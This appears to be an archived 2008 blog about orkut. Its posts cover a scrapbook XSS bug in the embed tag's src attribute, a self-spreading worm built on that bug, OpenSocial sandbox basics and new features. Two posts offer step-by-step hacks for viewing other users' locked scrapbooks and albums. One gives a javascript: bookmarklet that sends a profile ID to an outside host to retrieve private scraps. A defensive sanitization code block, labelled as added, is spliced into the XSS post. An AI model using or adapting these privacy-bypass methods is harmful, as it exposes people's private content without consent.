Friday, February 15, 2008

New Attack on orkut! User gets logged out by just opening scrapbook!

Hackers have discovered the most serious bug on orkut so far, and it is in orkut's most accessed area: the scrapbook!

What makes it so serious is that this time the user does not need to click or perform any action anywhere to trigger the vulnerable code.

Many users have suffered from this. Most of them are getting logged out of orkut just by visiting their own scrapbook. Worse, they cannot delete blank or suspicious scraps either! :-(

The bug is not fixed yet, and it can be used by malicious hackers to gain access to a victim's orkut account, so details about this bug will be posted after it gets rectified. Till then, use the following solution to protect yourself!

Objective: Blocking Flash content [on orkut at least]

Firefox users: Flashblock

Internet Explorer:

  • Go to the Tools Menu -> Internet Options
  • Click on the Security tab
  • Click on Custom Level
  • Disable Run ActiveX controls and plug-ins

Additionally, delete scraps from your scrapbook if you are getting logged out of orkut just by visiting your own scrapbook!

Thanks to Kee Hinckley for the timely post on the issue!



Beginners Guide To OpenSocial & Orkut Sandbox! [covering FAQ]

Many orkut users have asked me various questions about the orkut sandbox via scrapbook, comments, community, email and other media after I published 3 ways to read a locked scrapbook on orkut! In this post, I will try to clear up your doubts about the orkut sandbox and OpenSocial.

#What is OpenSocial?

From Wikipedia:

OpenSocial is a set of common application programming interfaces (APIs) for web-based social network applications, developed by Google, and released November 1, 2007. Applications implementing the OpenSocial APIs will be interoperable with any social network system that supports them, including features on sites such as MySpace and Friendster.

Except for facebook, almost all social networking sites are using OpenSocial. This means you can safely assume that if you write an application for orkut using the OpenSocial API, it will work on other sites (like MySpace, LinkedIn, etc.) almost without change! :-)

#What is orkut sandbox?

First, let's get the relevant definition of sandbox from Wikipedia:

"The term sandbox is commonly used in the development of Web services to refer to a mirrored production environment for use by external developers. Typically, a third-party developer will develop and create an application that will use a web service from the sandbox, which is used to allow third-party team to validate their code before migrating it to the production environment"

So think of the orkut sandbox as an orkut mirror where you can write applications using the OpenSocial API. It's like creating a fake orkut account to test a new orkut hack. Think of the sandbox as a fake profile with some features added/removed, created by orkut itself for you to test applications!

#Cool… How to sign up for the orkut sandbox?

By default, sandbox access is disabled for an orkut account. You can request access to the sandbox using the orkut sandbox sign-up form. Sandbox access is completely free and requires you to have an orkut account beforehand.

After submitting the sign-up form, you get a mail from Google (normally in 2-3 days) indicating the status of your request.

#How to access the sandbox? Where is it?

The sandbox is an extension to your existing orkut account! After receiving the confirmation mail from Google, you can just log on to http://sandbox.orkut.com to enter the sandbox. You can also modify any orkut page's URL to get its view from the sandbox.

Example

http://www.orkut.com/scrapbook.aspx?uid=[some_num]

will become..

http://sandbox.orkut.com/scrapbook.aspx?uid=[some_num]

This URL change resulted in the scrapbook hack, which enabled people to read locked scrapbooks via the sandbox!

#Sandbox Limitation

OpenSocial API calls will operate on sandbox-whitelisted friends only. This means that to test your applications, you need either your friends to gain sandbox access or to add people who have access to the sandbox as friends. There is an orkut sandbox community where you can find people with sandbox access and add them.

This limitation is enforced for security reasons, as explained by Arne Roomann-Kurrik!

Also, private information like users' email addresses cannot be accessed! So spammers, do not think about the sandbox as a way to carry out your evil intentions :-)

#Resources

If you are not familiar with words like sandbox or API, use the following Wikipedia links…

Best starting point for developers…

Worth bookmarking….

Finally if you need to communicate…

Let me know if I missed anything! :-)



Orkut Scrapbook XSS Bug is Still Active!

Two days after we posted about the scrapbook bug, and after demonstrations of its destructiveness by Rodrigo Lacerda (Portuguese link) and Jerry, it looks like the orkut team hasn't had enough of it!

So at the request of some members, and also to force orkut to take this more seriously, we are partially revealing the bug…

The bug is in the embed tag's src attribute! Orkut doesn't validate whether src points to a valid Flash media file URL, and thus any URL submitted as the value of the src attribute simply gets executed when the user opens the scrapbook! This is different from most infections, where the user has to generate some event like clicking on a particular region, link, etc.

Proof of Concept 1:

Here is harmless but highly annoying code which you can put in your friend's orkut scrapbook. This is the reason why some people were getting logged out of orkut just by visiting their scrapbook!

Code:

Proof of Concept 2:

A more serious but harmless exploitation is a worm created by Rodrigo Lacerda (Portuguese link), which performs the following routine.

  • You read the scrap with the code (in fact, you just open the scrapbook containing the code)
  • The code injects JavaScript into your browser
  • The JavaScript code makes you join the community
  • Then the code collects your list of friends
  • It sends the scrap with the code to them!

The community being joined is Infectados pelo Vírus do Orkut! Just check out the community page and reload it. Look how fast the number of members increases. :-)

Solution:

The solution is the Flashblock extension we talked about in earlier posts!

What should orkut do:

  • They should first activate CAPTCHA (i.e. image verification) for all URLs, including their own. That way the worm will stop spreading itself!
  • In future, they should validate user input properly. XSS is, most of the time, the result of improper input validation. Here, for example, they haven't checked the URL for filetype!
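The kind of server-side check the second point asks for, as an added example (not orkut's code and not part of the original post). The host allowlist, size limits and function names are assumptions made for illustration; the embed is rebuilt from validated values instead of passing the user's markup through.

```javascript
// Added example: validate a user-submitted <embed> before storing a scrap.
// ALLOWED_HOSTS is a hypothetical allowlist of media hosts.
const ALLOWED_HOSTS = new Set(["media.example.com", "video.example.net"]);

function validateEmbedSrc(rawSrc) {
  if (typeof rawSrc !== "string") return null;
  const candidate = rawSrc.trim();
  // Browsers strip tabs/newlines inside URLs; reject them outright.
  if (/[\u0000-\u0020\u007f]/.test(candidate)) return null;
  let url;
  try { url = new URL(candidate); } catch { return null; } // relative or malformed
  if (url.protocol !== "https:" && url.protocol !== "http:") return null;
  if (url.username || url.password) return null;        // no user@host tricks
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;     // only known media hosts
  // Filetype check on the normalized path (query strings and "/../" cannot fake it).
  // An extension alone does not prove the content is Flash, hence the allowlist.
  if (!/\.swf$/i.test(url.pathname)) return null;
  return url.href;
}

function boundedInt(value, min, max, fallback) {
  const n = Number.parseInt(value, 10);
  return Number.isInteger(n) && n >= min && n <= max ? n : fallback;
}

function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Returns safe markup, or "" when the embed must be dropped.
function sanitizeEmbed(attrs) {
  const src = validateEmbedSrc(attrs.src);
  if (src === null) return "";
  const w = boundedInt(attrs.width, 1, 640, 425);
  const h = boundedInt(attrs.height, 1, 480, 350);
  // Fixed attributes: the movie may not call page script or open other URLs.
  return `<embed src="${escapeAttr(src)}" type="application/x-shockwave-flash"` +
         ` width="${w}" height="${h}"` +
         ` allowscriptaccess="never" allownetworking="internal">`;
}
```

Dropping the whole embed on any failed check means an unexpected URL never reaches the scrapbook page at all.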

Update: Orkut, in an official blog post, claims to have fixed the bug! But this embed tag bug is still open! They might have fixed another bug which Rodrigo used!

Link: Post by Rodrigo Lacerda (in Portuguese ) | Flash Block Solution | Jerry post | Orkut’s official blog post



Now You Can Have Your Orkut Profile in Google Search!

Yep. Soon Google crawlers will be indexing orkut profiles, and everyone on orkut will be googlable. In simple terms, you can use Google search to find your friends' orkut profiles, and your friends can do the same to find you!

Although there is no official post regarding this on any Google or Orkut official blog, a new privacy setting - "orkut in google search results", indicates just this.

[Image: orkut in google search results]

By default this setting is configured to show your orkut information in search results! That’s why you don’t need to do anything to appear in google search.

Those who are concerned about privacy can choose the "hide information" option. There is no fine-grained control like facebook provides. So better opt for hiding if you have doubts about how this feature will be used (or abused).

Three months back, facebook opened its user database to search engines, and considering that move by facebook, this should not surprise anyone.

Also can orkut do this as sensibly as facebook did?

Related: Read how facebook did that!



Orkut Viewing Locked Scrapbook Hack is Back!

Important Update: This hack has been rectified by orkut, SO IT WILL NOT WORK ANYMORE. If I find a new hack I will definitely post it here!

You may subscribe to my RSS feed or email alert to receive automatic updates regarding this and other hacks in future! (Jan 3, 2008)


Yep! For those who missed the old orkut hack to view a locked scrapbook, a new hack to do the same is here!

[Image: orkut unlock scrapbook]

#Steps to use this hack…

  • Navigate to the profile with the locked scrapbook, or to the locked scrapbook itself.
  • Now you will see the Profile ID in the address / navigation bar. E.g. in http://www.orkut.com/Profile.aspx?uid=10226448830416481862 , 10226448830416481862 is the Profile ID. Note down this Profile ID.
  • Now replace ProfileID in the following textbox with the Profile ID you noted above.
  • http://x13.110mb.com/scraps.php?uid=ProfileID
  • So with Profile ID 10226448830416481862, it becomes http://x13.110mb.com/scraps.php?uid=10226448830416481862
  • Finally, copy everything from the text box and paste it in the address bar. Hit ENTER and you will get the scraps.

#Alternate way… (Javascript)

  • Navigate to the profile with the locked scrapbook, or to the locked scrapbook itself.
  • Paste the following JavaScript in the address bar and hit ENTER.

javascript:var dw = document.location.href; dw = dw.split('=');document.location='http://x13.110mb.com/scraps.php?uid='+dw[1];

#Alternate way… (For Firefox Only)

You can drag-n-drop the following bookmarklet onto your browser's bookmark toolbar. That will create a bookmark named "UNLOCK SCRAPBOOK". Just click on it whenever you encounter a locked scrapbook and you will be redirected to the unlocked scrapbook automatically…

Unlock Scrapbook

Looks like a bad start for orkut in 2008. Thanks Jerry!

Also check out View Photos from Locked Orkut Album!



Organize Photos into Album on Orkut - New Feature!

After the photo upload limit was revised to 100, the next thing everyone wanted was a way to manage photos nicely! Orkut answered your call, and now you can group your photos into different albums like my vacation album, new year party pics, birthday snaps, …

So when you click the photos link now, you will see the following…

[image]

Just choose a title and description, and your album will be ready. Next you will be taken to a screen where you can upload pics into it! Uploading is the same old process. I was expecting a Java applet like facebook provides.

The final album will look like this…

[image]

After creating an album, the things you can customize anytime are

  • Album cover
  • Name of album i.e. title
  • Album description
  • Of course photos inside album!

One feature orkut should have given is a way to move photos between albums. As of now, if you have uploaded lots of photos on different topics to orkut, you cannot just move them into different albums. You have to download them to your hard drive first, then upload them again to a different album!

Anyway something nice from orkut after their scrapbook and album hacks!

Related: Official Orkut Blog Post



View Locked Orkut Album in Orkut Style!

Important Update: This hack has been rectified by orkut, SO IT WILL NOT WORK ANYMORE. If I find a new hack I will definitely post it here!

You may subscribe to my RSS feed or email alert to receive automatic updates regarding this and other hacks in future! (Jan 17, 2008)


This is the highly recommended way of exploiting the orkut album hack to unlock (view) pics in the album!

[Image: view locked orkut album]

Many users claimed that our old orkut album hack is not working. While we noticed a few exceptions, most of the users had trouble copying and pasting the lengthy JavaScript code. So here comes an automated way - a GreaseMonkey script!

Once you have installed the above script successfully, the next time you go to any locked orkut album you will see pics from the locked album in orkut style, along with an error message which has obviously lost its meaning! (See screenshot above)

#How to Install (Need to do this only once!)

That's it! All locks will be broken automatically, as if they never existed! :D

#Credits:

Thanks to Leandro Koiti Sato for creating this script. The original script is here. We made a small change in our version to give maximum results to our users!

Thanks to Bean for notifying us about the script! :-)

